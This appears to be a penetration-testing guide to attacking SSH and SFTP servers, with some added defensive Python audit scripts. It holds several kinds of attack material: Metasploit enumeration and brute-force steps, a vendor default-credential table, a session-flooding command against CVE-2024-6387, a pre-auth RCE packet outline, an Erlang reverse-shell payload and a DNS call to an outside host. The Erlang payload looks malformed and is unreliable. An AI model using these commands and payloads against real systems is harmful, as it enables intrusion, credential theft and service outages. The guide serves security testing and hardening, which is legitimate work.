22 - Pentesting SSH/SFTP

Tip

Learn and practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn and practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn and practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Basic Information

SSH (Secure Shell or Secure Socket Shell) is a network protocol that provides an authenticated, encrypted connection to a computer over an insecure network. It protects the confidentiality and integrity of data when accessing remote systems.

Default port: 22

22/tcp open  ssh     syn-ack

SSH servers:

  • openSSH – OpenBSD SSH, shipped in BSD, Linux distributions and Windows since Windows 10
  • Dropbear – SSH implementation for environments with low memory and processor resources, shipped in OpenWrt
  • PuTTY – SSH implementation for Windows; the client is commonly used, but use of the server is rare
  • CopSSH – implementation of OpenSSH for Windows

SSH libraries (implementing server-side):

  • libssh – multi-platform C library implementing the SSHv2 protocol with bindings in Python, Perl and R; used by KDE for sftp and by GitHub for the git SSH infrastructure
  • wolfSSH – SSHv2 server library written in ANSI C and targeted at embedded, RTOS and resource-constrained environments
  • Apache MINA SSHD – Apache SSHD Java library based on Apache MINA
  • paramiko – Python SSHv2 protocol library

Enumeration

nc -vn <IP> 22

Automated ssh-audit

ssh-audit is a tool for auditing the configuration of SSH servers and clients.

https://github.com/jtesta/ssh-audit is an updated fork of https://github.com/arthepsy/ssh-audit/

Features:

  • SSH1 and SSH2 protocol server support;
  • analyse SSH client configuration;
  • grab banner, recognise device or software and operating system, detect compression;
  • gather key-exchange, host-key, encryption and message authentication code algorithms;
  • output algorithm information (available since, removed/disabled, unsafe/weak/legacy, etc.);
  • output algorithm recommendations (append or remove based on the recognised software version);
  • output security information (related issues, assigned CVE list, etc.);
  • analyse SSH version compatibility based on algorithm information;
  • historical information from OpenSSH, Dropbear SSH and libssh;
  • runs on Linux and Windows;
  • no dependencies

usage: ssh-audit.py [-1246pbcnjvlt] <host>

-1,  --ssh1             force ssh version 1 only
-2,  --ssh2             force ssh version 2 only
-4,  --ipv4             enable IPv4 (order of precedence)
-6,  --ipv6             enable IPv6 (order of precedence)
-p,  --port=<port>      port to connect
-b,  --batch            batch output
-c,  --client-audit     starts a server on port 2222 to audit client
                        software config (use -p to change port;
                        use -t to change timeout)
-n,  --no-colors        disable colors
-j,  --json             JSON output
-v,  --verbose          verbose output
-l,  --level=<level>    minimum output level (info|warn|fail)
-t,  --timeout=<secs>   timeout (in seconds) for connection and reading
                        (default: 5)

$ python3 ssh-audit.py <IP>


Server's public SSH key

ssh-keyscan -t rsa <IP> -p <PORT>   # use -t rsa,ecdsa,ed25519 to fetch every common host key type

Weak Cipher Algorithms

This is detected by default by nmap (the ssh2-enum-algos script lists the offered key-exchange, host-key, cipher and MAC algorithms); for a rated report use ssh-audit as shown above. sslscan and sslyze are TLS scanners and do not enumerate SSH algorithms.

Nmap scripts

nmap -p22 <ip> -sC # Run nmap's default scripts for SSH
nmap -p22 <ip> -sV # Retrieve version
nmap -p22 <ip> --script ssh2-enum-algos # Retrieve supported algorithms
nmap -p22 <ip> --script ssh-hostkey --script-args ssh_hostkey=full # Retrieve full host keys and flag known-weak ones
nmap -p22 <ip> --script ssh-auth-methods --script-args="ssh.user=root" # Check authentication methods

Shodan

  • ssh

Brute force usernames, passwords and private keys

Username Enumeration

In some versions of OpenSSH you can perform a timing attack to enumerate users. You can use a metasploit module to exploit this:

msf> use scanner/ssh/ssh_enumusers

Brute force

Some common ssh credentials are collected in public default-credential lists and in the Default Credentials table below.

Private Key Brute Force

If you know some ssh private keys that could be used... let's try them. You can use the nmap script:

https://nmap.org/nsedoc/scripts/ssh-publickey-acceptance.html

Or the MSF auxiliary module:

msf> use scanner/ssh/ssh_identify_pubkeys

Or use ssh-keybrute.py (native python3, lightweight and has legacy algorithms enabled): snowdroppe/ssh-keybrute.

Known bad keys can be found here:

rapid7/ssh-badkeys on GitHub (authorized directory, master branch)

Weak SSH keys / Debian predictable PRNG

Some systems have known flaws in the random seed used to generate cryptographic material. This can result in a dramatically reduced keyspace which can be brute-forced. Pre-generated sets of keys generated on Debian systems affected by the weak PRNG are available here: g0tmi1k/debian-ssh.

You should look there to search for valid keys for the target machine.

Kerberos / GSSAPI SSO

If the target SSH server supports GSSAPI (for example Windows OpenSSH on a domain controller), you can authenticate with your Kerberos TGT instead of a password.

Workflow from a Linux attacker host:

# 1) Ensure time is in sync with the KDC to avoid KRB_AP_ERR_SKEW
sudo ntpdate <dc.fqdn>

# 2) Generate a krb5.conf for the target realm (optional, but handy)
netexec smb <dc.fqdn> -u <user> -p '<pass>' -k --generate-krb5-file krb5.conf
sudo cp krb5.conf /etc/krb5.conf

# 3) Obtain a TGT for the user
kinit <user>
klist

# 4) SSH with GSSAPI, using the FQDN that matches the host SPN
ssh -o GSSAPIAuthentication=yes <user>@<host.fqdn>

Notes:

  • If you connect using the wrong name (e.g. a short host name, an alias, or a bad entry in /etc/hosts) you may get "Server not found in Kerberos database", because the SPN does not match. The ssh client takes the ticket from the default credential cache (or the one named in KRB5CCNAME).
  • crackmapexec ssh --kerberos can also use your ccache for Kerberos authentication.

Default Credentials

Vendor   | Usernames | Passwords
---------|-----------|----------
APC      | apc, device | apc
Brocade  | admin | admin123, password, brocade, fibranne
Cisco    | admin, cisco, enable, hsa, pix, pnadmin, ripeop, root, shelladmin | admin, Admin123, default, password, secur4u, cisco, Cisco, _Cisco, cisco123, C1sco!23, Cisco123, Cisco1234, TANDBERG, change_it, 12345, ipics, pnadmin, diamond, hsadb, c, cc, attack, blender, changeme
Citrix   | root, nsroot, nsmaint, vdiadmin, kvm, cli, admin | C1trix321, nsroot, nsmaint, kaviza, kaviza123, freebsd, public, rootadmin, wanscaler
D-Link   | admin, user | private, admin, user
Dell     | root, user1, admin, vkernel, cli | calvin, 123456, password, vkernel, Stor@ge!, admin
EMC      | admin, root, sysadmin | EMCPMAdm7n, Password#1, Password123#, sysadmin, changeme, emc
HP/3Com  | admin, root, vcx, app, spvar, manage, hpsupport, opc_op | admin, password, hpinvent, iMC123, pvadmin, passw0rd, besgroup, vcx, nice, access, config, 3V@rpar, 3V#rpar, procurve, badg3r5, OpC_op, !manage, !admin
Huawei   | admin, root | 123456, admin, root, Admin123, Admin@storage, Huawei12#$, HwDec@01, hwosta2.0, HuaWei123, fsp200@HW, huawei123
IBM      | USERID, admin, manager, mqm, db2inst1, db2fenc1, dausr1, db2admin, iadmin, system, device, ufmcli, customer | PASSW0RD, passw0rd, admin, password, Passw8rd, iadmin, apc, 123456, cust0mer
Juniper  | netscreen | netscreen
NetApp   | admin | netapp123
Oracle   | root, oracle, oravis, applvis, ilom-admin, ilom-operator, nm2user | changeme, ilom-admin, ilom-operator, welcome1, oracle
VMware   | vi-admin, root, hqadmin, vmware, admin | vmware, vmw@re, hqadmin, default

SSH-MitM

If you are on the local network and the victim is going to connect to an SSH server using a username and password, you could try to perform a MitM attack to steal those credentials:

Attack path:

  • Traffic Redirection: the attacker redirects the victim's traffic to their own machine, intercepting the connection attempt to the SSH server.
  • Interception and Logging: the attacker's machine acts as a proxy, capturing the user's login details by pretending to be the legitimate SSH server.
  • Command Execution and Relay: finally, the attacker's server logs the user's credentials, relays the commands to the real SSH server, executes them and returns the results to the user, making the process appear seamless and legitimate.

SSH MITM does exactly what is described above.

This only works because the victim accepts an unknown or changed host key: the client prints the "REMOTE HOST IDENTIFICATION HAS CHANGED" warning when the key differs from known_hosts, and StrictHostKeyChecking=yes with a pre-distributed known_hosts entry defeats the attack. Only password and keyboard-interactive credentials can be captured this way; public-key authentication cannot be relayed, because the client's signature covers the session identifier of its own connection.

To actually capture/perform the MitM you can use techniques such as ARP spoofing, DNS spoofing or the others described in Network Spoofing attacks.

SSH-Snake

If you want to traverse a network using the SSH private keys discovered on systems, utilising each private key on each system for new hosts, then SSH-Snake is what you need.

SSH-Snake performs the following tasks automatically and recursively:

  1. On the current system, find any SSH private keys,
  2. On the current system, find any hosts or destinations (user@host) that the private keys may be accepted on,
  3. Attempt to SSH into all of the destinations using all of the private keys discovered,
  4. If a destination is successfully connected to, repeat steps #1 - #4 on the connected-to system.

It is completely self-replicating and self-propagating, and completely fileless.
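As an added example (not SSH-Snake's own code, which is a bash script, and not from the original page), the Python below implements the discovery half of the loop above for one home directory: it finds private keys by their PEM header rather than their file name, and harvests candidate user@host targets from ~/.ssh/config, known_hosts and shell history. The same discovery feeds the private-key brute-force step earlier on the page. All sample files are constructed; the login attempts of step 3 are deliberately left out.

```python
import os
import re
import stat
import tempfile
from pathlib import Path

PEM_HEADERS = (b'-----BEGIN OPENSSH PRIVATE KEY-----', b'-----BEGIN RSA PRIVATE KEY-----',
               b'-----BEGIN EC PRIVATE KEY-----', b'-----BEGIN DSA PRIVATE KEY-----',
               b'-----BEGIN PRIVATE KEY-----', b'-----BEGIN ENCRYPTED PRIVATE KEY-----')
USERHOST_RE = re.compile(r'(?<![\w.-])(?P<user>[\w.-]+)@(?P<host>[\w.-]+)')
SSH_CMD_RE = re.compile(r'(?:^|[\s;&|])(?:ssh|scp|sftp|rsync)\s')

def find_private_keys(home):
    """Step 1: regular files under home whose first bytes are a PEM private-key header (name-agnostic)."""
    found = []
    for dirpath, _dirs, files in os.walk(home):
        for name in files:
            p = Path(dirpath) / name
            try:
                if not stat.S_ISREG(p.lstat().st_mode):
                    continue                                  # skip symlinks, sockets, devices
                with open(p, 'rb') as fh:
                    head = fh.read(64)
            except OSError:
                continue                                      # unreadable: not ours to take
            if head.startswith(PEM_HEADERS):
                found.append(p)
    return sorted(found)

def parse_ssh_config(text):
    """Step 2a: user@host per Host block of ~/.ssh/config; HostName/User override the alias, wildcards skipped."""
    blocks, cur = [], None
    for line in text.splitlines():
        line = line.split('#', 1)[0].strip()
        if not line:
            continue
        parts = re.split(r'[\s=]+', line, maxsplit=1)
        key, value = parts[0].lower(), (parts[1].strip() if len(parts) > 1 else '')
        if key == 'host':
            cur = {'alias': value, 'hostname': None, 'user': None}
            blocks.append(cur)
        elif cur is not None and key in ('hostname', 'user'):
            cur[key] = value
    targets = set()
    for b in blocks:
        if any(c in b['alias'] for c in '*?!'):
            continue
        host = b['hostname'] or b['alias']
        targets.add(f"{b['user']}@{host}" if b['user'] else host)
    return targets

def parse_known_hosts(text):
    """Step 2b: hosts from known_hosts; hashed (|1|...) lines cannot be reversed, so they are skipped."""
    hosts = set()
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(('#', '|1|', '@')):
            continue
        for h in line.split()[0].split(','):
            hosts.add(h[1:].split(']')[0] if h.startswith('[') else h)   # [host]:port -> host
    return hosts

def parse_shell_history(text):
    """Step 2c: user@host pairs from ssh/scp/sftp/rsync invocations in shell history."""
    targets = set()
    for line in text.splitlines():
        if SSH_CMD_RE.search(line):
            targets.update(f"{m['user']}@{m['host']}" for m in USERHOST_RE.finditer(line))
    return targets

def discover(home):
    """Steps 1-2 of the SSH-Snake loop for one home directory (step 3, trying keys, is not implemented)."""
    home = Path(home)
    def read(rel):
        p = home / rel
        return p.read_text(errors='replace') if p.is_file() else ''
    targets = parse_ssh_config(read('.ssh/config'))
    for hist in ('.bash_history', '.zsh_history'):
        targets |= parse_shell_history(read(hist))
    return {'keys': find_private_keys(home), 'hosts': parse_known_hosts(read('.ssh/known_hosts')), 'targets': targets}

# constructed sample files (not taken from any real host)
SAMPLE_CONFIG = "Host db\n  HostName db01.internal\n  User postgres\nHost *\n  ServerAliveInterval 30\n"
SAMPLE_KNOWN_HOSTS = "web01,10.0.0.7 ssh-ed25519 AAAA\n[bastion]:2222 ssh-rsa AAAA\n|1|aGFzaA==|c2FsdA== ssh-rsa AAAA\n"
SAMPLE_HISTORY = "ls -la\nssh -i ~/.ssh/id_ed25519 alice@10.0.0.5\nscp dump.sql bob@db01:/tmp/\n"

def build_sample_home():
    """Throwaway home directory populated with the samples above plus one private and one public key."""
    home = Path(tempfile.mkdtemp(prefix='snake-'))
    (home / '.ssh').mkdir()
    (home / '.ssh' / 'id_ed25519').write_bytes(b'-----BEGIN OPENSSH PRIVATE KEY-----\nAAAA\n-----END OPENSSH PRIVATE KEY-----\n')
    (home / '.ssh' / 'id_ed25519.pub').write_text('ssh-ed25519 AAAA alice@box\n')
    (home / '.ssh' / 'config').write_text(SAMPLE_CONFIG)
    (home / '.ssh' / 'known_hosts').write_text(SAMPLE_KNOWN_HOSTS)
    (home / '.bash_history').write_text(SAMPLE_HISTORY)
    return home

if __name__ == '__main__':
    import sys
    print(discover(sys.argv[1] if len(sys.argv) > 1 else build_sample_home()))
```

Run it with a home directory as the only argument; without one it builds and scans the constructed sample. Hashed known_hosts entries (HashKnownHosts yes) are skipped rather than cracked, and hosts from known_hosts are returned without a user so they can be paired with every local account name during step 3.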

Config Misconfigurations

Root login

Some SSH servers (and vendor or cloud images) still allow the root user to log in with a password, which poses a significant security risk; OpenSSH's own default since 7.0 is prohibit-password (root may only log in with a key). Disabling root login is a critical step in securing a server: it removes the most privileged account from password brute-force attacks and limits the impact of a leaked password.

Disabling root login in OpenSSH:

  1. Edit the SSH configuration file: sudoedit /etc/ssh/sshd_config
  2. Change the setting from #PermitRootLogin yes to PermitRootLogin no.
  3. Check the result: sshd -t validates the syntax and sshd -T | grep -i permitrootlogin prints the effective value.
  4. Restart the SSH server to apply the change: sudo systemctl restart sshd (the unit is called ssh on Debian/Ubuntu).

SFTP Brute Force

SFTP command execution

A common SFTP misconfiguration arises when administrators intend users to exchange files without getting remote shell access. Restricting the account to a non-interactive login (a restricted shell, a wrapper that only blocks interactive sessions, or "exit" logic in profile scripts) and confining it to a specific directory is not enough, because sshd hands any command the client requests to the account's login shell as shell -c command, before any interactive shell logic takes over. A user can therefore request a command (or /bin/bash itself) on the ssh command line and bypass the intended restriction; only ForceCommand, or a login shell that refuses -c such as /usr/sbin/nologin, actually prevents this.

Example:

ssh -v noraj@192.168.1.94 id
...
Password:
debug1: Authentication succeeded (keyboard-interactive).
Authenticated to 192.168.1.94 ([192.168.1.94]:22).
debug1: channel 0: new [client-session]
debug1: Requesting no-more-sessions@openssh.com
debug1: Entering interactive session.
debug1: pledge: network
debug1: client_input_global_request: rtype hostkeys-00@openssh.com want_reply 0
debug1: Sending command: id
debug1: client_input_channel_req: channel 0 rtype exit-status reply 0
debug1: client_input_channel_req: channel 0 rtype eow@openssh.com reply 0
uid=1000(noraj) gid=100(users) groups=100(users)
debug1: channel 0: free: client-session, nchannels 1
Transferred: sent 2412, received 2480 bytes, in 0.1 seconds
Bytes per second: sent 43133.4, received 44349.5
debug1: Exit status 0

$ ssh noraj@192.168.1.94 /bin/bash

Here is an example of a secure SFTP configuration (/etc/ssh/sshd_config – openSSH) for the user noraj:

Match User noraj
    ChrootDirectory %h
    ForceCommand internal-sftp
    AllowTcpForwarding no
    PermitTunnel no
    X11Forwarding no
    PermitTTY no

This configuration allows SFTP only: it disables shell access by forcing the start command and disabling TTY access, and it also disables every kind of port forwarding or tunneling. Note that the ChrootDirectory (and every path component above it) must be owned by root and not writable by any other user or group, otherwise sshd refuses the login.

SFTP Tunneling

If you have access to an SFTP server you can also tunnel your traffic through it, for example using the common port forwarding (this only works if AllowTcpForwarding is not disabled for the account; sudo is only needed to bind a privileged local port):

sudo ssh -L <local_port>:<remote_host>:<remote_port> -N -f <username>@<ip_compromised>

SFTP Symlink

sftp has the "symlink" command. Therefore, if you have write rights in some folder, you can create symlinks to other folders/files. As you are probably trapped inside a chroot this won't be especially useful for you, but if you can access the created symlink from a non-chroot service (for example, if you can reach the symlink from the web), you can open the symlinked files through the web.

For example, to create a symlink from a new file "froot" to "/":

sftp> symlink / froot

If you can access the file "froot" via the web, you will be able to list the root ("/") folder of the system.
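To turn the symlink trick into a check, the following Python (an added example, not part of the original page or of OpenSSH) walks an SFTP jail and lists the symlinks that a non-chrooted process such as a web server would follow outside the jail, and shows where the chrooted sftp-server lands for the same link. The jail contents are constructed in a temporary directory.

```python
import os
import tempfile
from pathlib import Path

def escaping_symlinks(chroot):
    """Symlinks below chroot whose target, resolved the way a non-chrooted process (e.g. a web server
    serving the same directory) resolves it, lies outside chroot. Returns (link, raw_target, real_target)."""
    root = Path(os.path.realpath(chroot))
    hits = []
    for dirpath, dirnames, filenames in os.walk(root):   # followlinks=False: never descend into links
        for name in dirnames + filenames:
            link = Path(dirpath) / name
            if not link.is_symlink():
                continue
            real = Path(os.path.realpath(link))
            if real != root and root not in real.parents:
                hits.append((link, os.readlink(link), real))
    return hits

def chrooted_target(chroot, link):
    """Where the chrooted sftp-server lands for the same link: absolute targets are re-rooted at the
    jail and '..' cannot climb above it, so 'symlink / froot' just points back at the jail itself."""
    root = Path(os.path.abspath(chroot))
    raw = os.readlink(link)
    if os.path.isabs(raw):
        inside = raw
    else:
        inside = '/' + str(Path(os.path.abspath(link)).parent.relative_to(root) / raw)
    return root / os.path.normpath(inside).lstrip('/')

def build_sample_chroot():
    """Constructed fixture mimicking a user's SFTP jail (not a real system)."""
    root = Path(tempfile.mkdtemp(prefix='sftp-jail-')).resolve()
    (root / 'uploads').mkdir()
    os.symlink('uploads', root / 'docs')                    # harmless: stays inside the jail
    os.symlink('/', root / 'froot')                         # the trick from the text
    os.symlink('../../../../etc/passwd', root / 'passwd')   # traversal variant of the same idea
    return root

if __name__ == '__main__':
    import sys
    jail = Path(sys.argv[1]) if len(sys.argv) > 1 else build_sample_chroot()
    for link, raw, real in escaping_symlinks(jail):
        print(f'{link} -> {raw}: web server sees {real}, sftp user sees {chrooted_target(jail, link)}')
```

Pass the jail directory (the user's ChrootDirectory) as the argument; with no argument it scans the constructed sample and reports froot and passwd but not docs. The fix on the server side is not to serve a writable SFTP directory from a non-chrooted process, or to have that process refuse to follow symlinks (for example Options -FollowSymLinks in Apache).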

Authentication methods

In high-security environments it is common to enable only key-based or two-factor authentication rather than simple password-based authentication. But often the stronger methods are enabled without disabling the weaker ones. A frequent case is enabling publickey in the openSSH configuration and setting it as the default method without disabling password (which, like keyboard-interactive, defaults to yes). By using the verbose mode of the SSH client, an attacker can see that a weaker method is enabled:

ssh -v 192.168.1.94
OpenSSH_8.1p1, OpenSSL 1.1.1d  10 Sep 2019
...
debug1: Authentications that can continue: publickey,password,keyboard-interactive

For example, if an authentication failure limit is set and you never get the chance to reach the password method, you can use the PreferredAuthentications option to force the use of that method:

ssh -v 192.168.1.94 -o PreferredAuthentications=password
...
debug1: Next authentication method: password

Reviewing the SSH server configuration is necessary to check that only the expected methods are authorised. Using verbose mode on the client helps to verify that the configuration is effective.
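Tying together the root-login, SFTP-jail and authentication-method points above, here is an added Python example (not from the original page or from OpenSSH) that parses an sshd_config, applies the sshd_config(5) defaults and reports the weaknesses discussed: PermitRootLogin yes, password or keyboard-interactive still enabled next to publickey, and a ChrootDirectory Match block that lacks the hardening settings. Both configurations are constructed samples.

```python
import re

# sshd_config(5) defaults for the keywords this audit looks at (keywords and values lower-cased)
DEFAULTS = {
    'permitrootlogin': 'prohibit-password', 'passwordauthentication': 'yes',
    'kbdinteractiveauthentication': 'yes', 'pubkeyauthentication': 'yes',
    'forcecommand': 'none', 'allowtcpforwarding': 'yes', 'permittunnel': 'no',
    'x11forwarding': 'no', 'permittty': 'yes',
}
# what an SFTP-only chroot Match block should pin down (the hardened example above)
SFTP_JAIL = {'forcecommand': 'internal-sftp', 'allowtcpforwarding': 'no',
             'permittunnel': 'no', 'x11forwarding': 'no', 'permittty': 'no'}

def parse_sshd_config(text):
    """Return (global_options, [(match_criteria, options), ...]).
    Like sshd, the first occurrence of a keyword wins and '#' starts a comment."""
    glob, matches, cur = {}, [], None
    for raw in text.splitlines():
        line = raw.split('#', 1)[0].strip()
        if not line:
            continue
        parts = re.split(r'[\s=]+', line, maxsplit=1)
        key, value = parts[0].lower(), (parts[1].strip() if len(parts) > 1 else '')
        if key == 'match':
            cur = {}
            matches.append((value, cur))
        else:
            (glob if cur is None else cur).setdefault(key, value)
    return glob, matches

def effective(key, *scopes):
    """Effective value of key: the Match scope first, then the global scope, then the built-in default."""
    for opts in scopes:
        if key in opts:
            return opts[key].lower()
    return DEFAULTS[key]

def audit(text):
    """Findings for the weaknesses discussed on this page, as human-readable strings."""
    glob, matches = parse_sshd_config(text)
    findings = []
    if effective('permitrootlogin', glob) == 'yes':
        findings.append('PermitRootLogin yes: root can log in with a password')
    weak = [k for k in ('passwordauthentication', 'kbdinteractiveauthentication') if effective(k, glob) == 'yes']
    if effective('pubkeyauthentication', glob) == 'yes' and weak:
        findings.append('publickey enabled but weaker methods still on (they default to yes): ' + ', '.join(weak))
    for crit, opts in matches:
        if 'chrootdirectory' not in opts:
            continue
        for key, want in SFTP_JAIL.items():
            got = effective(key, opts, glob)
            if got != want:
                findings.append(f'Match {crit}: {key} is {got!r}, an SFTP jail needs {want!r}')
    return findings

# constructed samples: the first looks hardened at a glance but is not, the second is the page's hardened setup
WEAK_CONFIG = """\
Port 22
PermitRootLogin yes
PubkeyAuthentication yes
#PasswordAuthentication no
Match User noraj
    ChrootDirectory %h
    ForceCommand internal-sftp
"""
HARDENED_CONFIG = """\
PermitRootLogin no
PubkeyAuthentication yes
PasswordAuthentication no
KbdInteractiveAuthentication no
Match User noraj
    ChrootDirectory %h
    ForceCommand internal-sftp
    AllowTcpForwarding no
    PermitTunnel no
    X11Forwarding no
    PermitTTY no
"""

if __name__ == '__main__':
    import sys
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else WEAK_CONFIG
    for f in audit(text) or ['no findings']:
        print(f)
```

Point it at a copy of /etc/ssh/sshd_config; on the host itself, sshd -T (and sshd -T -C user=noraj for a Match block) prints the effective configuration after defaults and Match processing, which is the authoritative reference. The parser deliberately ignores Include files and compound Match criteria, so treat its output as a first pass.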

Configuration files

ssh_config
sshd_config
authorized_keys
ssh_known_hosts
known_hosts
id_rsa

Fuzzing

Recent Notable Vulnerabilities (2024)

CVE-2024-6387 – regreSSHion signal-handler race

OpenSSH 8.5p1–9.7p1 dropped the async-signal-safe logging guard inside sshd's SIGALRM handler, reintroducing CVE-2006-5051 and letting unauthenticated attackers corrupt the glibc heap once LoginGraceTime expires. Qualys weaponised the bug for root RCE on 32-bit Linux and noted that 64-bit targets are likely exploitable with enough attempts to groom the allocator state, so prioritise hosts that still advertise those versions during banner grabs.

Exploitation is timing-dependent: flood the daemon with half-open, unauthenticated sessions so that the privileged pre-auth process hits the vulnerable signal path repeatedly while you groom the allocator state.

Operator notes:

  • Fingerprint builds from the remote banner (nc -vn <target> 22 or nmap -sV; note that ssh -V only prints your own client's version) and check whether the advertised OpenSSH version falls in 8.5p1–9.7p1. LoginGraceTime is not visible remotely, but a non-zero value shows up as the server closing an idle unauthenticated connection after the grace period (120 s by default).
  • Pressure-test a lab target by spamming short sessions that never attempt authentication, e.g.:
parallel -j200 "timeout 3 ssh -o PreferredAuthentications=none -o ConnectTimeout=2 attacker@${TARGET}" ::: {1..4000}
  • Hosts that set LoginGraceTime 0 cannot reach the buggy code path – expect only a DoS angle by exhausting MaxStartups.
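As an added example (not from the original page, Qualys or ssh-audit), the Python script below grabs the server identification line the way nc -vn does in the Enumeration section, parses it per RFC 4253, and reports whether the advertised OpenSSH version falls in the 8.5p1–9.7p1 range. The sample banners are constructed and the target in the usage is a placeholder.

```python
import re
import socket

# OpenSSH range affected by CVE-2024-6387 (regreSSHion): 8.5p1 up to and including 9.7p1
REGRESSHION_MIN = (8, 5)
REGRESSHION_MAX = (9, 7)

# RFC 4253 s4.2: SSH-protoversion-softwareversion SP comments
BANNER_RE = re.compile(r'^SSH-(?P<proto>[\d.]+)-(?P<sw>\S+)(?:\s+(?P<comment>.*))?$')
OPENSSH_VER_RE = re.compile(r'^OpenSSH_(?P<major>\d+)\.(?P<minor>\d+)(?:p(?P<patch>\d+))?')

def parse_banner(line):
    """Split an SSH identification string into protocol version, software string and comment."""
    m = BANNER_RE.match(line.strip())
    if not m:
        raise ValueError(f'not an SSH banner: {line!r}')
    d = m.groupdict()
    d['comment'] = d['comment'] or ''
    return d

def openssh_version(software):
    """(major, minor) for an OpenSSH software string, or None for other servers (Dropbear, libssh, ...)."""
    m = OPENSSH_VER_RE.match(software)
    return (int(m['major']), int(m['minor'])) if m else None

def is_regresshion_candidate(banner):
    """True when the banner advertises OpenSSH 8.5p1..9.7p1. Upstream version only: a distro
    package may backport the fix while keeping this version string, so confirm before reporting."""
    ver = openssh_version(parse_banner(banner)['sw'])
    return ver is not None and REGRESSHION_MIN <= ver <= REGRESSHION_MAX

def grab_banner(host, port=22, timeout=5.0):
    """Read the server identification line; the server sends it first, so no client banner is needed."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        data = b''
        while b'\n' not in data and len(data) < 255:
            chunk = s.recv(255 - len(data))
            if not chunk:
                break
            data += chunk
    return data.decode('ascii', 'replace').strip()

if __name__ == '__main__':
    import sys
    # constructed sample banners, used when no target is given on the command line
    samples = ['SSH-2.0-OpenSSH_9.6p1 Ubuntu-3ubuntu13.5', 'SSH-2.0-OpenSSH_9.8', 'SSH-2.0-dropbear_2022.83']
    banners = [grab_banner(sys.argv[1])] if len(sys.argv) > 1 else samples
    for b in banners:
        info = parse_banner(b)
        print(f"{b:45} sw={info['sw']:20} comment={info['comment']!r:22} regreSSHion-range={is_regresshion_candidate(b)}")
```

Run it with a host name or IP to test a live server, or without arguments to see the three constructed banners classified. The banner comment (e.g. Ubuntu-3ubuntu13.5) usually identifies the distro package, which is what you need to check for a backported fix; servers other than OpenSSH return None from openssh_version and are out of scope for this CVE.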

CVE-2024-3094 – xz/liblzma supply-chain backdoor

XZ Utils 5.6.0 and 5.6.1 shipped with trojanised release tarballs whose build scripts unpacked a hidden object during Debian/RPM packaging on x86-64 Linux. The payload uses a glibc IFUNC resolver to hook RSA_public_decrypt inside sshd (the distro systemd-notify patches are what cause liblzma to be loaded into sshd) and accepts attacker-signed packets for pre-auth code execution.

Because the malicious logic only lives in the packaged binaries, confirming exposure means checking what is installed on the victim: look at xz --version, rpm -qi xz / dpkg -l xz-utils, compare hashes of /usr/lib*/liblzma.so*, and check ldd /usr/sbin/sshd | grep -E "systemd|lzma" to see whether sshd even pulls in the affected dependency. The hook stays dormant unless the process was started as /usr/sbin/sshd (it checks argv[0]), so reproducing the backdoor in a lab usually requires recreating the distro build environment.

Authentication State-Machine Bypass (Pre-Auth RCE)

Several SSH servers contain logic flaws in their authentication finite-state machine that allow a client to send connection-protocol messages before authentication has completed. Because the server fails to verify that it is in the correct state, those messages are handled as if the user were fully authenticated, leading to unauthenticated code execution or session creation.

At the protocol level, any SSH message with a message code ≥ 80 (0x50) belongs to the connection layer (RFC 4254) and must be accepted only after authentication has succeeded (RFC 4252). If the server processes one of those messages while still in the SSH_AUTHENTICATION state, an attacker can immediately create a channel and request actions such as command execution, port forwarding, etc.

Generic Exploitation Steps

  1. Establish a TCP connection to the target's SSH port (usually 22, but other services may expose Erlang/OTP on 2022, 830, 2222...).
  2. Build a raw SSH packet (RFC 4253 binary packet format):
  • 4-byte packet_length (big-endian) followed by a 1-byte padding_length
  • 1-byte message_code ≥ 80 (e.g. SSH_MSG_CHANNEL_OPEN = 90, SSH_MSG_CHANNEL_REQUEST = 98)
  • payload appropriate to the chosen message type, then at least 4 bytes of padding so the whole packet is a multiple of 8 bytes
  3. Send the packet(s) before completing any authentication step.
  4. Interact with the server APIs that are now exposed pre-auth (command execution, port forwarding, file-system access, ...).

Python proof-of-concept outline:

import socket, struct
HOST, PORT = '10.10.10.10', 22

def ssh_packet(payload):
    # RFC 4253 binary packet (unencrypted): uint32 packet_length | byte padding_length | payload | padding;
    # the total length must be a multiple of 8 and the padding at least 4 bytes
    pad = 8 - (len(payload) + 5) % 8
    if pad < 4:
        pad += 8
    return struct.pack('>IB', len(payload) + 1 + pad, pad) + payload + b'\x00' * pad

s = socket.create_connection((HOST, PORT))
s.sendall(b'SSH-2.0-OpenSSH_9.8\r\n')   # our client banner; the server answers with its own
print(s.recv(256))
# key exchange is skipped: on vulnerable Erlang/OTP the bug is hit straight after the banner
# SSH_MSG_CHANNEL_OPEN (90): string "session", uint32 sender channel, initial window size, max packet size
chan_open = b'\x5a' + struct.pack('>I', 7) + b'session' + struct.pack('>III', 0, 0x100000, 0x4000)
s.sendall(ssh_packet(chan_open))
# additional CHANNEL_REQUEST (98) packets can follow to run commands

In practice you will need to perform (or skip) the key exchange depending on the target implementation, but no authentication is ever performed.


Erlang/OTP sshd (CVE-2025-32433)

  • Affected versions: OTP 27 < 27.3.3, OTP 26 < 26.2.5.11, OTP 25 < 25.3.2.20
  • Root cause: Erlang's native SSH daemon does not validate the current state before calling ssh_connection:handle_msg/2. Therefore any packet with message code 80-255 reaches the connection handler while the session is still in the userauth state.
  • Impact: unauthenticated remote code execution (the daemon usually runs as root on embedded/OT devices).

Example payload that spawns a reverse shell bound to the attacker-controlled channel. It is sent as an "exec" channel request (SSH_MSG_CHANNEL_REQUEST) whose command string the daemon evaluates as Erlang; the bytes below are the request type and command as seen in the packet:

% open a channel first (SSH_MSG_CHANNEL_OPEN, type "session") … then:
exec  inet:cmd(Channel, "exec('/bin/sh', ['-i'], [{fd, Channel#channel.fd}, {pid, true}]).")

Blind RCE / out-of-band detection can be done via DNS, again as an "exec" request:

exec  inet:gethostbyname("<random>.dns.outbound.watchtowr.com").

Detection and Mitigation:

  • Inspect SSH traffic: drop any packet with message code ≥ 80 seen before authentication completes.
  • Upgrade Erlang/OTP to 27.3.3 / 26.2.5.11 / 25.3.2.20 or later.
  • Limit exposure of management ports (22/2022/830/2222), especially on OT devices.

Other Affected Implementations

  • libssh 0.6 – 0.8 (server side) – CVE-2018-10933 – accepts an unauthenticated SSH_MSG_USERAUTH_SUCCESS sent by the client, effectively the inverse logic flaw (the client tells the server that authentication succeeded).

